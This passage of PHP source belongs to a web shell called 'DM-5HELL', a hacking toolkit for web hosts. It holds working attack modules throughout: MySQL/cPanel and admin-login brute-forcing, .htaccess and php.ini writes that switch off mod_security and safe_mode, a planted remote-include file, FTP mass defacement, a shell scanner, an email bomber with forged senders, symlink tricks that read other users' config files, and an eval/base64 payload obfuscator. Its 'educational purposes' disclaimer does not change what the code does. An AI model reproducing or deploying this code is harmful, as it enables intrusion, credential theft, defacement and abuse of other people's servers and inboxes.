  1959. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="inputz" value=" INJECT CODE :P "/></td></tr>
  1960. </form></table></center>
  1961.  
  1962.  
  1963.  
  1964. <?php
  1965. }
  1966. # x=bforce1
  1967. elseif(isset($_GET['x']) && ($_GET['x'] == 'bruteforce'))
  1968. {
  1969.  
  1970. $f =@fopen ('users.txt','w');
  1971. if(!$users=get_users()) {
  1972. echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>";
  1973. }
  1974. else {
  1975. foreach($users as $user) {
  1976. @fwrite($f , $user);
  1977. @fwrite($f , "\n");
  1978. }
  1979. }
  1980. echo '<br><center><font size=3 color=green>[+] BUKA users.txt <a href=dmshell.txt target=blank>_DISINI_</a> COPY & PASTE DI KOLOM USER [+]</font></center><BR>';
  1981. ?>
  1982.  
  1983. <form method="POST" target="_self">
  1984.  
  1985. <input name="page" type="hidden" value="find">
  1986. <table width="33%" cellpadding="3" cellspacing="1" align="center">
  1987. <tr>
  1988. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  1989. <strong>User :</strong></td>
  1990. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea class="inputz" cols="40" rows="10" name="usernames"></textarea></strong></td>
  1991. </tr>
  1992. <tr>
  1993. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  1994. <strong>Pass :</strong></td>
  1995. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea class="inputz" cols="40" rows="10" name="passwords"></textarea></strong></td>
  1996. </tr>
  1997. <tr>
  1998. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  1999. <strong>Type :</strong></td>
  2000. <td valign="top" bgcolor="#151515" colspan="5">
  2001. <span class="style2"><strong>Simple : </strong> </span>
  2002. <strong>
  2003. <input class="inputz" type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  2004. <font class="style2"><strong>/etc/passwd : </strong> </font>
  2005. <strong>
  2006. <input class="inputz" type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  2007. </strong>
  2008. </span>
  2009. </td></tr>
  2010. <tr>
  2011. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  2012. <td valign="top" bgcolor="#151515" colspan="5"><strong><input class="inputz" type="submit" value="_START CRACK _"></strong>
  2013. </td><tr></form>
  2014.  
  2015.  
  2016. <?php
  2017. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  2018. {
  2019. if($_POST['type'] == 'passwd'){
  2020.  
  2021. $e = explode("\n",$_POST['usernames']);
  2022. foreach($e as $value){
  2023. $k = explode(":",$value);
  2024. $username .= $k['0']." ";
  2025. }
  2026. }
  2027. elseif($_POST['type'] == 'simple'){
  2028. $username = str_replace("\n",' ',$_POST['usernames']);
  2029. }
  2030. $a1 = explode(" ",$username);
  2031. $a2 = explode("\n",$_POST['passwords']);
  2032. $id2 = count($a2);
  2033. $ok = 0;
  2034. foreach($a1 as $user )
  2035. {
  2036. if($user !== '')
  2037. {
  2038. $user=trim($user);
  2039. for($i=0;$i<=$id2;$i++)
  2040. {
  2041. $pass = trim($a2[$i]);
  2042. if(@mysql_connect('localhost',$user,$pass))
  2043. {
  2044. echo "[+] Username ( <b><font color=green>$user</font></b> ) Password ( <b><font color=green>$pass</font></b> ) [+]<br />";
  2045. $ok++;
  2046. }
  2047. }
  2048. }
  2049. }
  2050. echo "<hr><b>DAPAT <font color=green>$ok</font> Cpanel</b>";
  2051. echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  2052. exit;
  2053. }
  2054. }
  2055.  
  2056. # x=safemodeoff
  2057. elseif(isset($_GET['x']) && ($_GET['x'] == 'safemodeoff')) {
  2058. $file_pointer = fopen(".htaccess", "w+");
  2059. fwrite($file_pointer, "<IfModule mod_security.c>
  2060. SecFilterEngine Off
  2061. SecFilterScanPOST Off
  2062. </IfModule>");
  2063.  
  2064. $file_pointer = fopen("ini.php", "w+");
  2065. fwrite($file_pointer, "<?
  2066. echo ini_get(\"safe_mode\");
  2067. echo ini_get(\"open_basedir\");
  2068. include(\$_GET[\"file\"]);
  2069. ini_restore(\"safe_mode\");
  2070. ini_restore(\"open_basedir\");
  2071. echo ini_get(\"safe_mode\");
  2072. echo ini_get(\"open_basedir\");
  2073. include(\$_GET[\"ss\"]);
  2074. ?>");
  2075.  
  2076. $file_pointer = fopen("php.ini", "w+");
  2077. fwrite($file_pointer, "safe_mode = Off");
  2078. fwrite($file_pointer, "\n disable_functions = NONE");
  2079. fclose($file_pointer);
  2080. echo "<center>[+] Safe Mode Off Succesfully [+]</center>";
  2081. ?>
  2082.  
  2083. <?php }
  2084. // x=arabportal
  2085. elseif(isset($_GET['x']) && ($_GET['x'] == 'arabportal')){
  2086.  
  2087. ?>
  2088. <form action="?dm=<?php echo $pwd; ?>&amp;x=arabportal" method="post">
  2089.  
  2090. <?php
  2091. echo "<br/><br/><nobr><b><span class='b7'>O=:[ BRUTEFORCE</span> <span class='b8'>ARAB PORTAL ]:=O</span></b></nobr><br/><br/> <form method='POST'>
  2092. <p align='center' dir='ltr'>&nbsp;<input type='text' value='http://target.com/arabportal/' name='target' size='45'>
  2093. <input type='text' value='admin' name='username'>
  2094. <br><input type='submit' value='Start Brute'>
  2095. </p>";
  2096. $site = $_POST['target']."/admin/";
  2097. $username = $_POST['username'];
  2098. # Passwords
  2099. $passwords = array('123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012');
  2100.  
  2101. function brute($site,$username,$password)
  2102. {
  2103. $curl = curl_init();
  2104. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  2105. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  2106. curl_setopt($curl,CURLOPT_URL, $site);
  2107. curl_setopt($curl,CURLOPT_POSTFIELDS,"user_name={$username}&user_pass={$password}");
  2108. @curl_setopt($curl,CURLOPT_COOKIEJAR,"cookie.txt");
  2109. @curl_setopt($curl,CURLOPT_COOKIEFILE,"cookie.txt");
  2110. $brute = curl_exec($curl);
  2111. if(eregi('<p align="center"><b><font size="4" color="#FFFFFF">', $brute))
  2112. {
  2113. echo "<center><b><font face='Tahoma' size='2'>[+] Cracked Username
  2114. : <font color='#FF0000'>{$username}</font> &amp; Password : <font color='#FF0000'>{$password}</font></font></b>";
  2115. }
  2116. return $brute;
  2117. }
  2118. foreach($passwords as $password)
  2119. {
  2120. brute($site,$username,$password);
  2121. }
  2122. echo "</form>";
  2123. ?>
  2124.  
  2125. <?php }
  2126. // x=about
  2127. elseif(isset($_GET['x']) && ($_GET['x'] == 'about')){
  2128. ?>
  2129. <form action="?dm=<?php echo $pwd; ?>&amp;x=about" method="post">
  2130.  
  2131. <?php
  2132. echo "<div align='center'><br><br>
  2133. <table class='tabnet' style='padding:0 1px;'>
  2134. <tr><th align='center'><b>DISCLAIMER</b></th></tr>
  2135. <tr><td align='left'><nobr>
  2136. <span class='b12'>THIS TOOL WAS WRITTEN FOR
  2137. EDUCATIONAL PURPOSES.</span></nobr></td></tr>
  2138. <tr><td align='left'><nobr>
  2139. <span class='b12'>ONLY USE THIS TOOL ON WEBSITES YOU ARE ALLOWED TO TEST.</span></nobr></td></tr>
  2140. <tr><td align='left'><nobr>
  2141. <span class='b12'> IF YOU DON'T AGREE WITH WHAT I
  2142. SAID, PLEASE DON'T USE THIS TOOL.</span></td></tr>
  2143. <tr><td align='left'><nobr>
  2144. <span class='b12'> THE AUTHOR CANNOT AND WILL NOT IN ANY WAY LIABLE FOR ANY LOSS OR
  2145. DAMAGE ARISING WITH THE USE OF THIS TOOL. </span></nobr></td></tr>
  2146. <tr><td align='left'><nobr>
  2147. <span class='b12'>USE IT UNDER YOUR OWN RISK !!!!!!</span>
  2148. </nobr></td></tr>
  2149. <tr><td align='left'><nobr>
  2150. <span class='b12'>THANKS...</span>
  2151. </nobr></td></tr>
  2152. </table><br><br>
  2153. </html>";
  2154. echo "<div align='center'><br><br>
  2155. <table class='tabnet' style='padding:0 1px;'>
  2156. <tr><th align='center'><b>ABOUT DM-5HELL</b></th></tr>
  2157. <tr>
  2158. <td>
  2159. <table border=1>
  2160. <tr>
  2161. <td>Author</td>
  2162. <td>Andripzf</td>
  2163. </tr>
  2164. <tr>
  2165. <td>Design</td>
  2166. <td>Andripzf</td>
  2167. </tr>
  2168. <tr>
  2169. <td>Adding Exploit</td>
  2170. <td>Andripzf</td>
  2171. </tr>
  2172. <tr>
  2173. <td>Basic Shell</td>
  2174. <td>b374k m1n1 PHP Shell</td>
  2175. </tr>
  2176. <tr>
  2177. <td>Bypass Symlink</td>
  2178. <td><nobr>Thanks to Mauritania, Mr.Alasaek,Lagripe-Dz, PakCyber, BD Cyber Army</nobr></td>
  2179. </tr>
  2180. <tr>
  2181. <td>Whmcs Exploit</td>
  2182. <td><nobr>Thanks to Rab3oun, g00n, theMaster,Lagripe-Dz, X3group</nobr></td>
  2183. </tr>
  2184. <tr>
  2185. <td>WP Exploit</td>
  2186. <td>Thanks to XTTG, Lagripe-Dz</td>
  2187. </tr>
  2188. <tr>
  2189. <td>Joomla Exploit</td>
  2190. <td>Thanks to XTTG, Lagripe-Dz</td>
  2191. </tr>
  2192. <tr>
  2193. <td>VB Exploit</td>
  2194. <td>Thanks to Tryag</td>
  2195. </tr>
  2196. <tr>
  2197. <td>Config Killer Exploit</td>
  2198. <td><nobr>Thanks to Indishell, Anonghost, Lagripe-Dz, Indrajith</nobr></td>
  2199. </tr>
  2200. <tr>
  2201. <td>Security Bypass Exploit</td>
  2202. <td>Thanks to Mauritania, Lagripe-Dz </td>
  2203. </tr>
  2204. <tr>
  2205. <td>Greetz To</td>
  2206. <td><nobr>Exploit-DB, 1337 0day, All Moeslim Hackers And Coders In The World</nobr></td>
  2207. </tr>
  2208.  
  2209. </table>
  2210. </td></tr>
  2211. </table><br><br>
  2212. </html>";
  2213. ?>
  2214.  
  2215.  
  2216. <?php }
  2217. // x=coding
  2218. elseif(isset($_GET['x']) && ($_GET['x'] == 'coding')){
  2219. // encode & decode
  2220. ?>
  2221. <form action="?dm=<?php echo $pwd; ?>&amp;x=coding" method="post">
  2222.  
  2223. <?php {
  2224. echo "<br><br><center><div id=result> <nobr><b><span class='b7'>O=:[ ENCODE</span> <span class='b8'>DECODE ]:=O</span></b></nobr><br/><br/>
  2225. <form method='post'><table class=tbl>
  2226. <tr><td>Method : <select name='typed' style='color:red; background-color:black; border:1px solid #666;'>
  2227. <option>Encode</option><option>Decode</decode></select> </td></tr>
  2228. <tr><td>TYPE : <select name='typenc' style='color:red; background-color:black; border:1px solid #666;'>
  2229. <option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>
  2230. </td>
  2231. <tr><td>
  2232. <textarea spellcheck='false' style='color:#FF0000;background-color:#000000' cols='80' rows='25' name='php_content'></textarea></tr>
  2233. </td></table><hr/><input style='color:#FF0000;background-color:#000000' type='submit' value=' >> ' /><br /><hr /><br /></form></div>";
  2234.  
  2235. $meth_d=$_POST['typed'];
  2236. $typ_d=$_POST['typenc'];
  2237. $c_ntent=$_POST['php_content'];
  2238. $c_ntent=$c_ntent;
  2239. switch($meth_d)
  2240. {
  2241. case "Encode":
  2242. switch($typ_d)
  2243. {
  2244. case "GZINFLATE":
  2245. $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  2246. $res_t="<?php eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
  2247. break;
  2248. case "GZUNCOMPRESS":
  2249. $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  2250. $res_t="<?php eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
  2251. break;
  2252. case "STR_ROT13":
  2253. $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>');
  2254. $res_t=base64_encode(str_rot13($res_t));
  2255. $res_t="<?php eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
  2256. break;
  2257. }
  2258. break;
  2259. case "Decode":
  2260. switch($typ_d)
  2261. {
  2262. case "GZINFLATE":
  2263. $res_t=gzinflate(base64_decode($c_ntent));
  2264. break;
  2265. case "GZUNCOMPRESS":
  2266. $res_t=gzuncompress(base64_decode($c_ntent));
  2267. break;
  2268. case "STR_ROT13":
  2269. $res_t=str_rot13(base64_decode($c_ntent));
  2270. break;
  2271. }
  2272. break;
  2273. }
  2274. echo "<center><div id=result><textarea spellcheck='false' style='color:#FF0000;background-color:#000000' cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";
  2275. }
  2276. ?>
  2277.  
  2278. <?php }
  2279. # x=sscan
  2280. elseif(isset($_GET['x']) && ($_GET['x'] == 'cp2')){
  2281. ?>
  2282. <form action="?dm=<?php echo $pwd; ?>&amp;x=cp2" method="post">
  2283.  
  2284. <br/><br/><center><nobr><b><span class='b7'>O=:[ FTP MASS</span> <span class='b8'>DEFACE ]:=O</span></b></nobr><br/><br/>
  2285.  
  2286. <form method="post">
  2287. <center>
  2288. IP Server:<input type="text" name="ip" value="127.0.0.1" />
  2289. <p>&nbsp;</p>
  2290. User's List:<br>
  2291. <textarea rows="10" style="width:35%;" name="users" value="The Users List"></textarea>
  2292. <p>&nbsp;</p>
  2293. Password's List:<br>
  2294. <textarea rows="10" style="width:35%;" name="passwords" value="The Password List"></textarea>
  2295. <p>&nbsp;</p>
  2296. Index File Name:<input type="text" name="index_name" value="index.php" /><br>
  2297. <p>&nbsp;</p>
  2298. Index File Link:<input type="text" name="index_link" value="index.txt" /><br>
  2299. <p>&nbsp;</p>
  2300. <input type="submit" name="forest" value="Mass Deface it" /><br><br>
  2301. </form></center>
  2302.  
  2303. <?php
  2304. set_time_limit(0);
  2305. if(isset($_POST['forest'])){
  2306. $ip=trim($_POST['ip']);
  2307. $users = explode("\n",$_POST["users"]);
  2308. $passwords = explode("\n",$_POST["passwords"]);
  2309. $index_name=trim($_POST['index_name']);$index_link=trim($_POST['index_link']);
  2310.  
  2311. foreach($users as $user){
  2312. foreach($passwords as $pass){
  2313. $connect_ip = ftp_connect($ip) or die("Couldn't Connect To $ip");
  2314. if(@ftp_login($connect_ip, trim($user), trim($pass))){
  2315.  
  2316. echo "<br>Connected To --> $ip@$user\n";@ftp_delete($connect_ip,$index_name);
  2317.  
  2318. $deface = ftp_put($connect_ip, "/public_html/".$index_name , $index_link, FTP_ASCII);
  2319. if($deface){
  2320. echo "<br><font color=green> $user --> Deface Success!!</font>";
  2321. break;
  2322. }else{
  2323. echo "<br><font color=red> $user --> Error Defacing!!</font>";
  2324. }
  2325. }else{
  2326. echo "<br><font color=red>Couldn't Connect To --> $ip@$user --> $pass</font>\n";
  2327. }
  2328. }
  2329. }
  2330. echo "<br><font size=5> ! Mass Defacing Was Done ! </font>";
  2331. }
  2332. ?>
  2333.  
  2334. <?php }
  2335. # x=sscan
  2336. elseif(isset($_GET['x']) && ($_GET['x'] == 'sscan')){
  2337. ?>
  2338. <form action="?dm=<?php echo $pwd; ?>&amp;x=sscan" method="post">
  2339.  
  2340. <br><br><center><div id=result> <nobr><b><span class='b7'>O=:[ SHELL</span> <span class='b8'>SCANNER ]:=O</span></b></nobr><br/><br/>
  2341.  
  2342. <table><form method='POST'>
  2343. <tr><td>URL TARGET : <input size=40 style='color:#FF0000;background-color:#000000' name='rem_web' value='http://'></td></tr>
  2344. <tr><td><font color=red>INPUT NAMA FILE / SHELL</font></tr></td>
  2345. <tr><td><textarea spellcheck='false' class='textarea_edit' style='color:#FF0000;background-color:#000000' cols=50 rows=30 name='tryzzz'>
  2346.  
  2347. WSO.php
  2348. dz.php
  2349. cpanelcracker.php
  2350. blackshadow.php
  2351. sym.php
  2352. ftpcracker.php
  2353. cpanel.php
  2354. cpn.php
  2355. sql.php
  2356. mysql.php
  2357. madspot.php
  2358. itsecteam_shell.php
  2359. b374k.php
  2360. madsopot.php
  2361. indishell.php
  2362. Cgishell.pl
  2363. killer.php
  2364. changeall.php
  2365. 2.php
  2366. Sh3ll.php
  2367. dz0.php
  2368. dam.php
  2369. user.php
  2370. dom.php
  2371. whmcs.php
  2372. r00t.php
  2373. c99.php
  2374. gaza.php
  2375. q.php
  2376. 1.php
  2377. d0mains.php
  2378. madspotshell.php
  2379. Sym.php
  2380. c22.php
  2381. c100.php
  2382. Cpanel.php
  2383. zone-h.php
  2384. cp.php
  2385. L3b.php
  2386. d.php
  2387. admin1.php
  2388. upload.php
  2389. up.php
  2390. uploads.php
  2391. sa.php
  2392. r57.php
  2393. shell.php
  2394. sa.php
  2395. </textarea></td></tr>
  2396. <tr><td><br /><input type='submit' style='color:#FF0000;background-color:#000000' value=' >> SCAN >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />
  2397.  
  2398. <?php
  2399. set_time_limit(0);
  2400. $rtr=array();
  2401. echo "<div id=result><center><table>";
  2402. $webz=$_POST['rem_web'];
  2403. $uri_in=$_POST['tryzzz'];
  2404. $r_xuri = trim($uri_in);
  2405. $r_xuri=explode("\n", $r_xuri);
  2406. foreach($r_xuri as $rty)
  2407. {
  2408. $urlzzx=$webz.$rty;
  2409. if(function_exists('curl_init'))
  2410. {
  2411. echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  2412. $ch = curl_init($urlzzx);
  2413. curl_setopt($ch, CURLOPT_NOBODY, true);
  2414. curl_exec($ch);
  2415. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  2416. curl_close($ch);
  2417. if($status_code==200)
  2418. {
  2419. echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  2420. } else {
  2421. echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  2422. }
  2423. } else {
  2424. echo "<font color=red>cURL Not Found </font>";
  2425. } }
  2426. echo "</table><br /><br /><hr /><br /><br /></div>";
  2427. ?>
  2428.  
  2429. <?php }
  2430. # x=bomail
  2431. elseif(isset($_GET['x']) && ($_GET['x'] == 'bomail')){
  2432. ?>
  2433. <form action="?y=<?php echo $pwd; ?>&amp;x=email" method="post">
  2434. <html>
  2435. <head><title>./DM TE4M</title>
  2436. </head>
  2437. <center><body bgcolor="black">
  2438. <a href="http://www.facebook.com/groups/D.MASTERPIECE"><img src="http://img59.imageshack.us/img59/9402/headerpicsay.jpg" border="0" width="200" height="50"></a><br><br>
  2439. <span style="color:white"> --=|[+] BOMB FAKE EMAIL [+]|=--<br/></center>
  2440. <span style="color:#00FF00"><hr></span>
  2441. <form method=post>
  2442. <input type=hidden value=dm name=dm>
  2443. <center><span style="color:#00FF00">-:[ X-EMAIL ]:-</span><br/>
  2444. <span style="color:white">**Isi Dengan Nama Email Palsu**<br/>
  2445. <input style="color:lime;background-color:#000000" name=wew value="<?echo $wew; ?>"></center>
  2446. <br/>
  2447. <center><span style="color:#00FF00">-:[ EMAIL TUJUAN ]:-</span><br/>
  2448. <span style="color:white">**Isi Email Target Bomb Email**</span><br/>
  2449. <input style="color:lime;background-color:#000000" name=wow value="<?echo $wow; ?>"></center>
  2450. <br/>
  2451. <center><span style="color:#00FF00">-:[ SUBJECT ]:-</span> <br/>
  2452. <span style="color:white">**Isi Nama Judul Pesan**</span><br/>
  2453. <input style="color:lime;background-color:#000000" name=anu value="<?echo $anu; ?>"></center>
  2454. <br/>
  2455. <center><span style="color:#00FF00">-:[ JUMLAH KIRIM ]:-</span><br/>
  2456. <span style="color:white">**Isi Nominal Antara 0 s/d 100**</span><br/>
  2457. <input style="color:lime;background-color:#000000" name=sodok value="<?echo $sodok; ?>"></center>
  2458. <br/>
  2459. <center><span style="color:#00FF00">-:PESAN ]:-</span><br/>
  2460. <span style="color:white">**Tulis Pesan Kamu**</span><br/>
  2461. <textarea style="color:lime;background-color:#000000" cols="30" rows="50" name=deathnote><?echo $deathnote?></textarea><br/>
  2462. <p>
  2463. <input style="color:lime;background-color:#000000" type=submit value=./CROTZ></center></form>
  2464. <span style="color:#00FF00"><hr></span>
  2465. <span style="color:yellow">
  2466. <?php
  2467. //DMASTERPIECE TE4M Introduction
  2468. $dm = $_POST['dm'];
  2469. //Fungsi Pengirim Email
  2470. $wew = $_POST['wew'];
  2471. //Fungsi Penerima Email
  2472. $wow = $_POST['wow'];
  2473. //Fungsi Jumlah Pesan Yg Akan Di Kirim
  2474. $sodok = $_POST['sodok'];
  2475. //Fungsi Subject Atau Judul
  2476. $anu = $_POST['anu'];
  2477. //Fungsi Isi Pesan
  2478. $deathnote = $_POST['deathnote'];
  2479.  
  2480. if ($dm=="dm" ) {
  2481. for ($i=0;$i <$sodok;$i++) {
  2482. $a= $wew;
  2483. $janda = $anu.$i;
  2484. mail( $wow,$janda,$deathnote.str_repeat(" ", 0*$xdm),"From: $a <$a>\r\n" );
  2485. } echo (" <center>* SUKSES :D | HAJAR LAGI BOS :P *</center>");
  2486. }
  2487. //WE ARE DMASTERPIECE
  2488. //WE ARE LEGION
  2489. //WE ARE FAMILY
  2490. //WE DO NOT FORGIVE
  2491. //WE DO NOT FORGET
  2492. //EXPECT US
  2493. exit;
  2494. ?>
  2495.  
  2496.  
  2497. <?php }
  2498. # x=plesk
  2499. elseif(isset($_GET['x']) && ($_GET['x'] == 'plesk')){ ?>
  2500. <form action="?dm=<?php echo $pwd; ?>&amp;x=plesk" method="post">
  2501. <?php
  2502. @mkdir('plesk', 0777);
  2503. $hta="Options all \n
  2504. DirectoryIndex Sux.html \n
  2505. AddType text/plain .php\n
  2506. AddHandler server-parsed .php";
  2507. $htaccess=@fopen('plesk/.htaccess', 'w');
  2508. fwrite($htaccess, $hta);
  2509. @symlink("/", "plesk/dm.txt");
  2510. ?>
  2511.  
  2512. <?php }
  2513. // x=apache
  2514. elseif(isset($_GET['x']) && ($_GET['x'] == 'apache')){
  2515. // symlink apache + config killer
  2516. ?>
  2517. <form action="?dm=<?php echo $pwd; ?>&amp;x=apache" method="post">
  2518. <?php
  2519. $head = '
  2520. <html>
  2521. <head>
  2522. </script>
  2523. <title>APACHE</title>
  2524. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  2525. <script language=\'javascript\'>
  2526. function hide_div(id)
  2527. {
  2528. document.getElementById(id).style.display = \'none\';
  2529. document.cookie=id+\'=0;\';
  2530. }
  2531. function show_div(id)
  2532. {
  2533. document.getElementById(id).style.display = \'block\';
  2534. document.cookie=id+\'=1;\';
  2535. }
  2536. function change_divst(id)
  2537. {
  2538. if (document.getElementById(id).style.display == \'none\')
  2539. show_div(id);
  2540. else
  2541. hide_div(id);
  2542. }
  2543. </script>'; ?>
  2544. <html>
  2545. <head>
  2546. <?php echo $head; ?>
  2547. <body bgcolor=black><center><br/><br/> <img src="http://silk.apana.org.au/graphics/apache_logo.gif">
  2548. <form method=post><br/><br/>
  2549. <nobr><b><span class='b7'>O=:[ APACHE</span> <span class='b8'>TOOLS ]:=O</span></b></nobr><br/><br/>
  2550. <p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
  2551.  
  2552. <?php
  2553. if(isset($_POST['usre'])){
  2554. ?>
  2555. <form method=post>
  2556. <textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd");
  2557. foreach($users as $user)
  2558. {
  2559. $str=explode(":",$user);
  2560. echo $str[0]."\n";
  2561. }
  2562.  
  2563. ?></textarea><br><br>
  2564. <input type=submit style=color:#FF0000;background-color:#000000 name=su value="EXECUTE" /></form><br/>
  2565. <?php } ?>
  2566.  
  2567. <?php
  2568. error_reporting(0);
  2569. if(isset($_POST['su'])){
  2570. mkdir('dm',0777);
  2571. $rr = "Options all \r
  2572. DirectoryIndex Sux.html \r
  2573. AddType text/plain .php \r
  2574. AddType text/plain .html \r
  2575. AddType text/plain .bak \r
  2576. AddType text/plain .old \r
  2577. AddHandler server-parsed .php \r
  2578. AddHandler txt .html \r
  2579. Require None \r Satisfy Any";
  2580. $g = fopen('dm/.htaccess','w');
  2581. fwrite($g,$rr);
  2582. $dm = symlink("/","dm/dm.txt");
  2583. $rt="<a href=dm/dm.txt><b><span class='b11'>[ SYMLINK ]</span></b></a>";
  2584. echo "<nobr>[~]&nbsp;";
  2585. echo "$rt";
  2586.  
  2587. $dir=mkdir('DM',0777);
  2588. $r = "Options all \r
  2589. DirectoryIndex Sux.html \r
  2590. AddType text/plain .php \r
  2591. AddType text/plain .html \r
  2592. AddType text/plain .bak \r
  2593. AddType text/plain .old \r
  2594. AddHandler server-parsed .php \r
  2595. AddHandler txt .html \r
  2596. Require None \r
  2597. Satisfy Any";
  2598. $f = fopen('DM/.htaccess','w');
  2599. fwrite($f,$r);
  2600. $consym="<a href=DM/><b><span class='b11'>[ CONFIG KILLER ]</span></b> </a>";
  2601. echo "&nbsp;[~]&nbsp;";
  2602. echo "$consym";
  2603. echo "&nbsp;[~]</nobr>";
  2604.  
  2605. $usr=explode("\n",$_POST['user']);
  2606. $configuration=array(
  2607. "aksi.php",
  2608. "aksi.php.old",
  2609. "aksi.php.bak",
  2610. "conf.php",
  2611. "conf.php.old",
  2612. "conf.php.bak",
  2613. "conf_global.php",
  2614. "conf_global.php.old",
  2615. "conf_global.php.bak",
  2616. "config.php",
  2617. "config.php.old",
  2618. "config.php.bak",
  2619. "configuration.php",
  2620. "configuration.php.old",
  2621. "configuration.php.bak",
  2622. "conn.php",
  2623. "conn.php.old",
  2624. "conn.php.bak",
  2625. "connect.php",
  2626. "connect.php.old",
  2627. "connect.php.bak",
  2628. "connection.php",
  2629. "connection.php.old",
  2630. "connection.php.bak",
  2631. "db.php",
  2632. "db.php.old",
  2633. "db.php.bak",
  2634. "database.php",
  2635. "database.php.old",
  2636. "database.php.bak",
  2637. "inc.php",
  2638. "inc.php.old",
  2639. "inc.php.bak",
  2640. "koneksi.php",
  2641. "koneksi.php.old",
  2642. "koneksi.php.bak",
  2643. "mysql.php",
  2644. "myqsl.php.old",
  2645. "mysql.php.bak",
  2646. "setting.php",
  2647. "setting.php.old",
  2648. "setting.php.bak",
  2649. "Settings.php",
  2650. "Settings.php.old",
  2651. "Settings.php.bak",
  2652. "sql.php",
  2653. "sql.php.old",
  2654. "sql.php.bak");
  2655. foreach($usr as $uss ){
  2656. $us=trim($uss);
  2657. foreach($configuration as $c){
  2658. $rs="/home/".$us."/public_html/".$c;
  2659. $r="DM/".$us."~".$c;
  2660. symlink($rs,$r);
  2661. }
  2662. }
  2663. }
  2664. ?>
  2665.  
  2666. <?php }
  2667. // x=hostgator
  2668. elseif(isset($_GET['x']) && ($_GET['x'] == 'hostgator')){
  2669. // symlink hostgator + config killer
  2670. ?>
  2671. <form action="?dm=<?php echo $pwd; ?>&amp;x=hostgator" method="post">
  2672. <?php
  2673. $head = '
  2674. <html>
  2675. <head><title>HOSTGATOR</title>
  2676. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  2677. <script language=\'javascript\'>
  2678. function hide_div(id){
  2679. document.getElementById(id).style.display = \'none\';
  2680. document.cookie=id+\'=0;\';
  2681. }
  2682.  
  2683. function show_div(id){
  2684. document.getElementById(id).style.display = \'block\';
  2685. document.cookie=id+\'=1;\';
  2686. }
  2687.  
  2688. function change_divst(id){
  2689. if (document.getElementById(id).style.display == \'none\')
  2690. show_div(id);
  2691. else
  2692. hide_div(id);
  2693. }
  2694. </script>'; ?>
  2695. <html>
  2696. <head>
  2697. <?php echo $head; ?>
  2698. <body bgcolor=black><center><br/><br/><img src="http://partnernoc.cpanel.net/logo/822-4021-logo.png">
  2699. <form method=post><br/><br/>
  2700. <nobr><b><span class='b7'>O=:[ HOSTGATOR</span> <span class='b8'>TOOLS ]:=O</span></b></nobr><br/><br/>
  2701. <p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
  2702.  
  2703. <?php
  2704. if(isset($_POST['usre'])){
  2705. ?>
  2706. <form method=post>
  2707. <textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd");
  2708. foreach($users as $user){
  2709. $str=explode(":",$user);
  2710. echo $str[0]."\n";
  2711. }
  2712. ?></textarea><br><br>
  2713. <input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
  2714. <?php } ?>
  2715.  
  2716. <?php
  2717. error_reporting(0);
  2718. if(isset($_POST['su'])){
  2719. mkdir('hostgator',0777);
  2720. $r = "Options +FollowSymLinks \n
  2721. DirectoryIndex Sux.html \n
  2722. Options +Indexes \n
  2723. AddType text/plain .php \n
  2724. AddHandler server-parsed .php \n
  2725. AddType text/plain.html ";
  2726. $g = fopen('hostgator/.htaccess','w');
  2727. fwrite($g,$rr);
  2728. $dm = symlink("/","hostgator/dm.ini");
  2729. $rt="<a href=hostgator/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>";
  2730. echo "<nobr>[~]&nbsp;";
  2731. echo "$rt";
  2732.  
  2733. $dir=mkdir('HOSTGATOR',0777);
  2734. $rr = "Safe_mode = OFF \n
  2735. Disable_functions = NONE \n
  2736. Open_basedir = OFF";
  2737. $f = fopen('HOSTGATOR/php.ini','w');
  2738. fwrite($f,$rr);
  2739.  
  2740. $rrr = "Options +FollowSymLinks \n
  2741. DirectoryIndex Sux.html \n
  2742. Options +Indexes \n
  2743. AddType text/plain .php \n
  2744. AddHandler server-parsed .php \n
  2745. AddType text/plain.html ";
  2746. $ff = fopen('HOSTGATOR/.htaccess','w');
  2747. fwrite($ff,$rrr);
  2748.  
  2749. $consym="<a href=HOSTGATOR/>
  2750. <span class='b11'>[ CONFIG KILLER ]</span></b></a>";
